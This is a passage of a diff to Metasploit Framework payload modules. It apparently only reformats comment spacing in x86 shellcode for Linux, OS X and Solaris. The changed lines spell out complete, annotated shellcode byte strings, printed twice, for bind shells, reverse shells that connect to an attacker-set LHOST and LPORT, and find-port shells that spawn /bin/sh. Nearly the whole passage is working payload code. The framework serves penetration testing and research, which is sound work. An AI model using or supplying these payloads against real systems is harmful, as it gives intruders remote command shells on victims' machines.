+            "\x89\xe3"              + #  mov    %esp,%ebx
+            "\x41"                  + #  inc    %ecx
+            "\xcd\x80"                #  int    $0x80
         }
       ))
   end

--- a/modules/payloads/singles/linux/x86/shell_find_port.rb
+++ b/modules/payloads/singles/linux/x86/shell_find_port.rb
@@ -32,38 +32,38 @@ module MetasploitModule
               'CPORT' => [ 25, 'n' ],
             },
           'Payload' =>
-            "\x31\xdb"             +#   xorl    %ebx,%ebx                  #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\x89\xe7"             +#   movl    %esp,%edi                  #
-            "\x6a\x10"             +#   pushl   $0x10                      #
-            "\x54"                 +#   pushl   %esp                       #
-            "\x57"                 +#   pushl   %edi                       #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\x89\xe1"             +#   movl    %esp,%ecx                  #
-            "\xb3\x07"             +#   movb    $0x07,%bl                  #
-            "\xff\x01"             +#   incl    (%ecx)                     #
-            "\x6a\x66"             +#   pushl   $0x66                      #
-            "\x58"                 +#   popl    %eax                       #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\x66\x81\x7f\x02\x04\xd2"+#   cmpw    $0xd204,0x02(%edi)         #
-            "\x75\xf1"             +#   jne     <fndsockcode+14>           #
-            "\x5b"                 +#   popl    %ebx                       #
-            "\x6a\x02"             +#   pushl   $0x02                      #
-            "\x59"                 +#   popl    %ecx                       #
-            "\xb0\x3f"             +#   movb    $0x3f,%al                  #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\x49"                 +#   decl    %ecx                       #
-            "\x79\xf9"             +#   jns     <fndsockcode+33>           #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x68\x2f\x2f\x73\x68" +#   pushl   $0x68732f2f                #
-            "\x68\x2f\x62\x69\x6e" +#   pushl   $0x6e69622f                #
-            "\x89\xe3"             +#   movl    %esp,%ebx                  #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\x89\xe1"             +#   movl    %esp,%ecx                  #
-            "\x99"                 +#   cltd                               #
-            "\xb0\x0b"             +#   movb    $0x0b,%al                  #
-            "\xcd\x80"              #   int     $0x80                      #
+            "\x31\xdb"             + #   xorl    %ebx,%ebx                  #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\x89\xe7"             + #   movl    %esp,%edi                  #
+            "\x6a\x10"             + #   pushl   $0x10                      #
+            "\x54"                 + #   pushl   %esp                       #
+            "\x57"                 + #   pushl   %edi                       #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\x89\xe1"             + #   movl    %esp,%ecx                  #
+            "\xb3\x07"             + #   movb    $0x07,%bl                  #
+            "\xff\x01"             + #   incl    (%ecx)                     #
+            "\x6a\x66"             + #   pushl   $0x66                      #
+            "\x58"                 + #   popl    %eax                       #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\x66\x81\x7f\x02\x04\xd2" + #   cmpw    $0xd204,0x02(%edi)         #
+            "\x75\xf1"             + #   jne     <fndsockcode+14>           #
+            "\x5b"                 + #   popl    %ebx                       #
+            "\x6a\x02"             + #   pushl   $0x02                      #
+            "\x59"                 + #   popl    %ecx                       #
+            "\xb0\x3f"             + #   movb    $0x3f,%al                  #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\x49"                 + #   decl    %ecx                       #
+            "\x79\xf9"             + #   jns     <fndsockcode+33>           #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x68\x2f\x2f\x73\x68" + #   pushl   $0x68732f2f                #
+            "\x68\x2f\x62\x69\x6e" + #   pushl   $0x6e69622f                #
+            "\x89\xe3"             + #   movl    %esp,%ebx                  #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\x89\xe1"             + #   movl    %esp,%ecx                  #
+            "\x99"                 + #   cltd                               #
+            "\xb0\x0b"             + #   movb    $0x0b,%al                  #
+            "\xcd\x80"               #   int     $0x80                      #
         }
       ))
   end

--- a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb
@@ -39,32 +39,32 @@ module MetasploitModule
     if remainder == 0 then remainder = 4 end
     shell_padded = ("/" * (4-remainder)) + shell
 
-    "\x31\xdb"             +#   xor ebx,ebx
-    "\xf7\xe3"             +#   mul ebx
-    "\x53"                 +#   push ebx
-    "\x43"                 +#   inc ebx
-    "\x53"                 +#   push ebx
-    "\x6a\x02"             +#   push byte +0x2
-    "\x89\xe1"             +#   mov ecx,esp
-    "\xb0\x66"             +#   mov al,0x66 (sys_socketcall)
-    "\xcd\x80"             +#   int 0x80
-    "\x93"                 +#   xchg eax,ebx
-    "\x59"                 +#   pop ecx
-    "\xb0\x3f"             +#   mov al,0x3f (sys_dup2)
-    "\xcd\x80"             +#   int 0x80
-    "\x49"                 +#   dec ecx
-    "\x79\xf9"             +#   jns 0x11
+    "\x31\xdb"             + #   xor ebx,ebx
+    "\xf7\xe3"             + #   mul ebx
+    "\x53"                 + #   push ebx
+    "\x43"                 + #   inc ebx
+    "\x53"                 + #   push ebx
+    "\x6a\x02"             + #   push byte +0x2
+    "\x89\xe1"             + #   mov ecx,esp
+    "\xb0\x66"             + #   mov al,0x66 (sys_socketcall)
+    "\xcd\x80"             + #   int 0x80
+    "\x93"                 + #   xchg eax,ebx
+    "\x59"                 + #   pop ecx
+    "\xb0\x3f"             + #   mov al,0x3f (sys_dup2)
+    "\xcd\x80"             + #   int 0x80
+    "\x49"                 + #   dec ecx
+    "\x79\xf9"             + #   jns 0x11
     "\x68" + [IPAddr.new(datastore['LHOST'], Socket::AF_INET).to_i].pack('N') + #   push ip addr
     "\x68\x02\x00" + [datastore['LPORT'].to_i].pack('S>') + #   push port
-    "\x89\xe1"             +#   mov ecx,esp
-    "\xb0\x66"             +#   mov al,0x66 (sys_socketcall)
-    "\x50"                 +#   push eax
-    "\x51"                 +#   push ecx
-    "\x53"                 +#   push ebx
-    "\xb3\x03"             +#   mov bl,0x3
-    "\x89\xe1"             +#   mov ecx,esp
-    "\xcd\x80"             +#   int 0x80
-    "\x52"                 +#   push edx
+    "\x89\xe1"             + #   mov ecx,esp
+    "\xb0\x66"             + #   mov al,0x66 (sys_socketcall)
+    "\x50"                 + #   push eax
+    "\x51"                 + #   push ecx
+    "\x53"                 + #   push ebx
+    "\xb3\x03"             + #   mov bl,0x3
+    "\x89\xe1"             + #   mov ecx,esp
+    "\xcd\x80"             + #   int 0x80
+    "\x52"                 + #   push edx
 
     # Split shellname into 4-byte words and push them one-by-one
     # on to the stack
@@ -72,11 +72,11 @@ module MetasploitModule
       "\x68" + word.reverse.pack('C*')
     end.join +
 
-    "\x89\xe3"             +#   mov ebx,esp
-    "\x52"                 +#   push edx
-    "\x53"                 +#   push ebx
-    "\x89\xe1"             +#   mov ecx,esp
-    "\xb0\x0b"             +#   mov al,0xb (execve)
+    "\x89\xe3"             + #   mov ebx,esp
+    "\x52"                 + #   push edx
+    "\x53"                 + #   push ebx
+    "\x89\xe1"             + #   mov ecx,esp
+    "\xb0\x0b"             + #   mov al,0xb (execve)
     "\xcd\x80"              #   int 0x80
   end
 end

--- a/modules/payloads/singles/osx/x86/shell_bind_tcp.rb
+++ b/modules/payloads/singles/osx/x86/shell_bind_tcp.rb
@@ -32,45 +32,45 @@ module MetasploitModule
               'LPORT'    => [ 6, 'n' ],
             },
           'Payload' =>
-            "\x31\xc0"             +#   xorl    %eax,%eax                  #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x68\xff\x02\x04\xd2" +#   pushl   $0xd20402ff                #
-            "\x89\xe7"             +#   movl    %esp,%edi                  #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x6a\x01"             +#   pushl   $0x01                      #
-            "\x6a\x02"             +#   pushl   $0x02                      #
-            "\x6a\x10"             +#   pushl   $0x10                      #
-            "\xb0\x61"             +#   movb    $0x61,%al                  #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\x57"                 +#   pushl   %edi                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x6a\x68"             +#   pushl   $0x68                      #
-            "\x58"                 +#   popl    %eax                       #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\x89\x47\xec"         +#   movl    %eax,-0x14(%edi)           #
-            "\xb0\x6a"             +#   movb    $0x6a,%al                  #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\xb0\x1e"             +#   movb    $0x1e,%al                  #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x6a\x5a"             +#   pushl   $0x5a                      #
-            "\x58"                 +#   popl    %eax                       #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\xff\x4f\xe4"         +#   decl    -0x1c(%edi)                #
-            "\x79\xf6"             +#   jns     <bndsockcode+42>           #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x68\x2f\x2f\x73\x68" +#   pushl   $0x68732f2f                #
-            "\x68\x2f\x62\x69\x6e" +#   pushl   $0x6e69622f                #
-            "\x89\xe3"             +#   movl    %esp,%ebx                  #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x54"                 +#   pushl   %esp                       #
-            "\x54"                 +#   pushl   %esp                       #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\xb0\x3b"             +#   movb    $0x3b,%al                  #
-            "\xcd\x80"              #   int     $0x80                      #
+            "\x31\xc0"             + #   xorl    %eax,%eax                  #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x68\xff\x02\x04\xd2" + #   pushl   $0xd20402ff                #
+            "\x89\xe7"             + #   movl    %esp,%edi                  #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x6a\x01"             + #   pushl   $0x01                      #
+            "\x6a\x02"             + #   pushl   $0x02                      #
+            "\x6a\x10"             + #   pushl   $0x10                      #
+            "\xb0\x61"             + #   movb    $0x61,%al                  #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\x57"                 + #   pushl   %edi                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x6a\x68"             + #   pushl   $0x68                      #
+            "\x58"                 + #   popl    %eax                       #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\x89\x47\xec"         + #   movl    %eax,-0x14(%edi)           #
+            "\xb0\x6a"             + #   movb    $0x6a,%al                  #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\xb0\x1e"             + #   movb    $0x1e,%al                  #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x6a\x5a"             + #   pushl   $0x5a                      #
+            "\x58"                 + #   popl    %eax                       #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\xff\x4f\xe4"         + #   decl    -0x1c(%edi)                #
+            "\x79\xf6"             + #   jns     <bndsockcode+42>           #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x68\x2f\x2f\x73\x68" + #   pushl   $0x68732f2f                #
+            "\x68\x2f\x62\x69\x6e" + #   pushl   $0x6e69622f                #
+            "\x89\xe3"             + #   movl    %esp,%ebx                  #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x54"                 + #   pushl   %esp                       #
+            "\x54"                 + #   pushl   %esp                       #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\xb0\x3b"             + #   movb    $0x3b,%al                  #
+            "\xcd\x80"               #   int     $0x80                      #
         }
       ))
   end

--- a/modules/payloads/singles/osx/x86/shell_find_port.rb
+++ b/modules/payloads/singles/osx/x86/shell_find_port.rb
@@ -32,40 +32,40 @@ module MetasploitModule
               'CPORT' => [ 25, 'n' ],
             },
           'Payload' =>
-            "\x31\xc0"             +#   xorl    %eax,%eax                  #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x89\xe7"             +#   movl    %esp,%edi                  #
-            "\x6a\x10"             +#   pushl   $0x10                      #
-            "\x54"                 +#   pushl   %esp                       #
-            "\x57"                 +#   pushl   %edi                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x58"                 +#   popl    %eax                       #
-            "\x58"                 +#   popl    %eax                       #
-            "\x40"                 +#   incl    %eax                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x6a\x1f"             +#   pushl   $0x1f                      #
-            "\x58"                 +#   popl    %eax                       #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\x66\x81\x7f\x02\x04\xd2"+#   cmpw    $0xd204,0x02(%edi)         #
-            "\x75\xee"             +#   jne     <fndsockcode+11>           #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x6a\x5a"             +#   pushl   $0x5a                      #
-            "\x58"                 +#   popl    %eax                       #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\xff\x4f\xf0"         +#   decl    -0x10(%edi)                #
-            "\x79\xf6"             +#   jns     <fndsockcode+30>           #
-            "\x68\x2f\x2f\x73\x68" +#   pushl   $0x68732f2f                #
-            "\x68\x2f\x62\x69\x6e" +#   pushl   $0x6e69622f                #
-            "\x89\xe3"             +#   movl    %esp,%ebx                  #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x54"                 +#   pushl   %esp                       #
-            "\x54"                 +#   pushl   %esp                       #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\xb0\x3b"             +#   movb    $0x3b,%al                  #
-            "\xcd\x80"              #   int     $0x80                      #
+            "\x31\xc0"             + #   xorl    %eax,%eax                  #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x89\xe7"             + #   movl    %esp,%edi                  #
+            "\x6a\x10"             + #   pushl   $0x10                      #
+            "\x54"                 + #   pushl   %esp                       #
+            "\x57"                 + #   pushl   %edi                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x58"                 + #   popl    %eax                       #
+            "\x58"                 + #   popl    %eax                       #
+            "\x40"                 + #   incl    %eax                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x6a\x1f"             + #   pushl   $0x1f                      #
+            "\x58"                 + #   popl    %eax                       #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\x66\x81\x7f\x02\x04\xd2" + #   cmpw    $0xd204,0x02(%edi)         #
+            "\x75\xee"             + #   jne     <fndsockcode+11>           #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x6a\x5a"             + #   pushl   $0x5a                      #
+            "\x58"                 + #   popl    %eax                       #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\xff\x4f\xf0"         + #   decl    -0x10(%edi)                #
+            "\x79\xf6"             + #   jns     <fndsockcode+30>           #
+            "\x68\x2f\x2f\x73\x68" + #   pushl   $0x68732f2f                #
+            "\x68\x2f\x62\x69\x6e" + #   pushl   $0x6e69622f                #
+            "\x89\xe3"             + #   movl    %esp,%ebx                  #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x54"                 + #   pushl   %esp                       #
+            "\x54"                 + #   pushl   %esp                       #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\xb0\x3b"             + #   movb    $0x3b,%al                  #
+            "\xcd\x80"               #   int     $0x80                      #
         }
       ))
   end

--- a/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb
@@ -33,37 +33,37 @@ module MetasploitModule
               'LPORT'    => [ 8, 'n'    ],
             },
           'Payload' =>
-            "\x68\x7f\x00\x00\x01" +#   pushl   $0x0100007f                #
-            "\x68\xff\x02\x04\xd2" +#   pushl   $0xd20402ff                #
-            "\x89\xe7"             +#   movl    %esp,%edi                  #
-            "\x31\xc0"             +#   xorl    %eax,%eax                  #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x6a\x01"             +#   pushl   $0x01                      #
-            "\x6a\x02"             +#   pushl   $0x02                      #
-            "\x6a\x10"             +#   pushl   $0x10                      #
-            "\xb0\x61"             +#   movb    $0x61,%al                  #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\x57"                 +#   pushl   %edi                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x6a\x62"             +#   pushl   $0x62                      #
-            "\x58"                 +#   popl    %eax                       #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x6a\x5a"             +#   pushl   $0x5a                      #
-            "\x58"                 +#   popl    %eax                       #
-            "\xcd\x80"             +#   int     $0x80                      #
-            "\xff\x4f\xe8"         +#   decl    -0x18(%edi)                #
-            "\x79\xf6"             +#   jns     <cntsockcode+34>           #
-            "\x68\x2f\x2f\x73\x68" +#   pushl   $0x68732f2f                #
-            "\x68\x2f\x62\x69\x6e" +#   pushl   $0x6e69622f                #
-            "\x89\xe3"             +#   movl    %esp,%ebx                  #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x54"                 +#   pushl   %esp                       #
-            "\x54"                 +#   pushl   %esp                       #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\xb0\x3b"             +#   movb    $0x3b,%al                  #
+            "\x68\x7f\x00\x00\x01" + #   pushl   $0x0100007f                #
+            "\x68\xff\x02\x04\xd2" + #   pushl   $0xd20402ff                #
+            "\x89\xe7"             + #   movl    %esp,%edi                  #
+            "\x31\xc0"             + #   xorl    %eax,%eax                  #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x6a\x01"             + #   pushl   $0x01                      #
+            "\x6a\x02"             + #   pushl   $0x02                      #
+            "\x6a\x10"             + #   pushl   $0x10                      #
+            "\xb0\x61"             + #   movb    $0x61,%al                  #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\x57"                 + #   pushl   %edi                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x6a\x62"             + #   pushl   $0x62                      #
+            "\x58"                 + #   popl    %eax                       #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x6a\x5a"             + #   pushl   $0x5a                      #
+            "\x58"                 + #   popl    %eax                       #
+            "\xcd\x80"             + #   int     $0x80                      #
+            "\xff\x4f\xe8"         + #   decl    -0x18(%edi)                #
+            "\x79\xf6"             + #   jns     <cntsockcode+34>           #
+            "\x68\x2f\x2f\x73\x68" + #   pushl   $0x68732f2f                #
+            "\x68\x2f\x62\x69\x6e" + #   pushl   $0x6e69622f                #
+            "\x89\xe3"             + #   movl    %esp,%ebx                  #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x54"                 + #   pushl   %esp                       #
+            "\x54"                 + #   pushl   %esp                       #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\xb0\x3b"             + #   movb    $0x3b,%al                  #
             "\xcd\x80"              #   int     $0x80                      #
         }
     ))

--- a/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb
+++ b/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb
@@ -32,54 +32,54 @@ module MetasploitModule
               'LPORT'    => [ 20, 'n' ],
             },
           'Payload' =>
-            "\x68\xff\xd8\xff\x3c" +#   pushl   $0x3cffd8ff                #
-            "\x6a\x65"             +#   pushl   $0x65                      #
-            "\x89\xe6"             +#   movl    %esp,%esi                  #
-            "\xf7\x56\x04"         +#   notl    0x04(%esi)                 #
-            "\xf6\x16"             +#   notb    (%esi)                     #
-            "\x31\xc0"             +#   xorl    %eax,%eax                  #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x68\xff\x02\x04\xd2" +#   pushl   $0xd20402ff                #
-            "\x89\xe7"             +#   movl    %esp,%edi                  #
-            "\x6a\x02"             +#   pushl   $0x02                      #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x6a\x02"             +#   pushl   $0x02                      #
-            "\x6a\x02"             +#   pushl   $0x02                      #
-            "\xb0\xe6"             +#   movb    $0xe6,%al                  #
-            "\xff\xd6"             +#   call    *%esi                      #
-            "\x6a\x10"             +#   pushl   $0x10                      #
-            "\x57"                 +#   pushl   %edi                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x31\xc0"             +#   xorl    %eax,%eax                  #
-            "\xb0\xe8"             +#   movb    $0xe8,%al                  #
-            "\xff\xd6"             +#   call    *%esi                      #
-            "\x5b"                 +#   popl    %ebx                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\xb0\xe9"             +#   movb    $0xe9,%al                  #
-            "\xff\xd6"             +#   call    *%esi                      #
-            "\xb0\xea"             +#   movb    $0xea,%al                  #
-            "\xff\xd6"             +#   call    *%esi                      #
-            "\x6a\x09"             +#   pushl   $0x09                      #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x6a\x3e"             +#   pushl   $0x3e                      #
-            "\x58"                 +#   popl    %eax                       #
-            "\xff\xd6"             +#   call    *%esi                      #
-            "\xff\x4f\xd8"         +#   decl    -0x28(%edi)                #
-            "\x79\xf6"             +#   jns     <bndsockcode+61>           #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x68\x2f\x2f\x73\x68" +#   pushl   $0x68732f2f                #
-            "\x68\x2f\x62\x69\x6e" +#   pushl   $0x6e69622f                #
-            "\x89\xe3"             +#   movl    %esp,%ebx                  #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\x89\xe1"             +#   movl    %esp,%ecx                  #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x51"                 +#   pushl   %ecx                       #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\xb0\x3b"             +#   movb    $0x3b,%al                  #
+            "\x68\xff\xd8\xff\x3c" + #   pushl   $0x3cffd8ff                #
+            "\x6a\x65"             + #   pushl   $0x65                      #
+            "\x89\xe6"             + #   movl    %esp,%esi                  #
+            "\xf7\x56\x04"         + #   notl    0x04(%esi)                 #
+            "\xf6\x16"             + #   notb    (%esi)                     #
+            "\x31\xc0"             + #   xorl    %eax,%eax                  #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x68\xff\x02\x04\xd2" + #   pushl   $0xd20402ff                #
+            "\x89\xe7"             + #   movl    %esp,%edi                  #
+            "\x6a\x02"             + #   pushl   $0x02                      #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x6a\x02"             + #   pushl   $0x02                      #
+            "\x6a\x02"             + #   pushl   $0x02                      #
+            "\xb0\xe6"             + #   movb    $0xe6,%al                  #
+            "\xff\xd6"             + #   call    *%esi                      #
+            "\x6a\x10"             + #   pushl   $0x10                      #
+            "\x57"                 + #   pushl   %edi                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x31\xc0"             + #   xorl    %eax,%eax                  #
+            "\xb0\xe8"             + #   movb    $0xe8,%al                  #
+            "\xff\xd6"             + #   call    *%esi                      #
+            "\x5b"                 + #   popl    %ebx                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\xb0\xe9"             + #   movb    $0xe9,%al                  #
+            "\xff\xd6"             + #   call    *%esi                      #
+            "\xb0\xea"             + #   movb    $0xea,%al                  #
+            "\xff\xd6"             + #   call    *%esi                      #
+            "\x6a\x09"             + #   pushl   $0x09                      #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x6a\x3e"             + #   pushl   $0x3e                      #
+            "\x58"                 + #   popl    %eax                       #
+            "\xff\xd6"             + #   call    *%esi                      #
+            "\xff\x4f\xd8"         + #   decl    -0x28(%edi)                #
+            "\x79\xf6"             + #   jns     <bndsockcode+61>           #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x68\x2f\x2f\x73\x68" + #   pushl   $0x68732f2f                #
+            "\x68\x2f\x62\x69\x6e" + #   pushl   $0x6e69622f                #
+            "\x89\xe3"             + #   movl    %esp,%ebx                  #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\x89\xe1"             + #   movl    %esp,%ecx                  #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x51"                 + #   pushl   %ecx                       #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\xb0\x3b"             + #   movb    $0x3b,%al                  #
             "\xff\xd6"              #   call    *%esi                      #
         }))
   end

--- a/modules/payloads/singles/solaris/x86/shell_find_port.rb
+++ b/modules/payloads/singles/solaris/x86/shell_find_port.rb
@@ -32,52 +32,52 @@ module MetasploitModule
               'CPORT' => [ 43, 'n' ],
             },
           'Payload' =>
-            "\x31\xdb"             +#   xorl    %ebx,%ebx                  #
-            "\xf7\xe3"             +#   mull    %ebx                       #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\x89\xe7"             +#   movl    %esp,%edi                  #
-            "\x68\xff\xd8\xff\x3c" +#   pushl   $0x3cffd8ff                #
-            "\x6a\x65"             +#   pushl   $0x65                      #
-            "\x89\xe6"             +#   movl    %esp,%esi                  #
-            "\xf7\x56\x04"         +#   notl    0x04(%esi)                 #
-            "\xf6\x16"             +#   notb    (%esi)                     #
-            "\x57"                 +#   pushl   %edi                       #
-            "\xb3\x91"             +#   movb    $0x91,%bl                  #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\x54"                 +#   pushl   %esp                       #
-            "\xb7\x54"             +#   movb    $0x54,%bh                  #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x58"                 +#   popl    %eax                       #
-            "\x40"                 +#   incl    %eax                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x6a\x36"             +#   pushl   $0x36                      #
-            "\x58"                 +#   popl    %eax                       #
-            "\xff\xd6"             +#   call    *%esi                      #
-            "\x66\x81\x7f\x02\x04\xd2"+#   cmpw    $0xd204,0x02(%edi)         #
-            "\x75\xf0"             +#   jne     <fndsockcode+31>           #
-            "\x58"                 +#   popl    %eax                       #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x6a\x09"             +#   pushl   $0x09                      #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x6a\x3e"             +#   pushl   $0x3e                      #
-            "\x58"                 +#   popl    %eax                       #
-            "\xff\xd6"             +#   call    *%esi                      #
-            "\xff\x4f\xe0"         +#   decl    -0x20(%edi)                #
-            "\x79\xf6"             +#   jns     <fndsockcode+52>           #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x68\x2f\x2f\x73\x68" +#   pushl   $0x68732f2f                #
-            "\x68\x2f\x62\x69\x6e" +#   pushl   $0x6e69622f                #
-            "\x89\xe3"             +#   movl    %esp,%ebx                  #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\x89\xe1"             +#   movl    %esp,%ecx                  #
-            "\x50"                 +#   pushl   %eax                       #
-            "\x51"                 +#   pushl   %ecx                       #
-            "\x53"                 +#   pushl   %ebx                       #
-            "\xb0\x3b"             +#   movb    $0x3b,%al                  #
-            "\xff\xd6"              #   call    *%esi                      #
+            "\x31\xdb"             + #   xorl    %ebx,%ebx                  #
+            "\xf7\xe3"             + #   mull    %ebx                       #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\x89\xe7"             + #   movl    %esp,%edi                  #
+            "\x68\xff\xd8\xff\x3c" + #   pushl   $0x3cffd8ff                #
+            "\x6a\x65"             + #   pushl   $0x65                      #
+            "\x89\xe6"             + #   movl    %esp,%esi                  #
+            "\xf7\x56\x04"         + #   notl    0x04(%esi)                 #
+            "\xf6\x16"             + #   notb    (%esi)                     #
+            "\x57"                 + #   pushl   %edi                       #
+            "\xb3\x91"             + #   movb    $0x91,%bl                  #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\x54"                 + #   pushl   %esp                       #
+            "\xb7\x54"             + #   movb    $0x54,%bh                  #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x58"                 + #   popl    %eax                       #
+            "\x40"                 + #   incl    %eax                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x6a\x36"             + #   pushl   $0x36                      #
+            "\x58"                 + #   popl    %eax                       #
+            "\xff\xd6"             + #   call    *%esi                      #
+            "\x66\x81\x7f\x02\x04\xd2"+ #   cmpw    $0xd204,0x02(%edi)         #
+            "\x75\xf0"             + #   jne     <fndsockcode+31>           #
+            "\x58"                 + #   popl    %eax                       #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x6a\x09"             + #   pushl   $0x09                      #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x6a\x3e"             + #   pushl   $0x3e                      #
+            "\x58"                 + #   popl    %eax                       #
+            "\xff\xd6"             + #   call    *%esi                      #
+            "\xff\x4f\xe0"         + #   decl    -0x20(%edi)                #
+            "\x79\xf6"             + #   jns     <fndsockcode+52>           #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x68\x2f\x2f\x73\x68" + #   pushl   $0x68732f2f                #
+            "\x68\x2f\x62\x69\x6e" + #   pushl   $0x6e69622f                #
+            "\x89\xe3"             + #   movl    %esp,%ebx                  #
+            "\x50"                 + #   pushl   %eax                       #
+            "\x53"                 + #   pushl   %ebx                       #
+            "\x89\xe1"             + #   movl    %esp,%ecx                  #
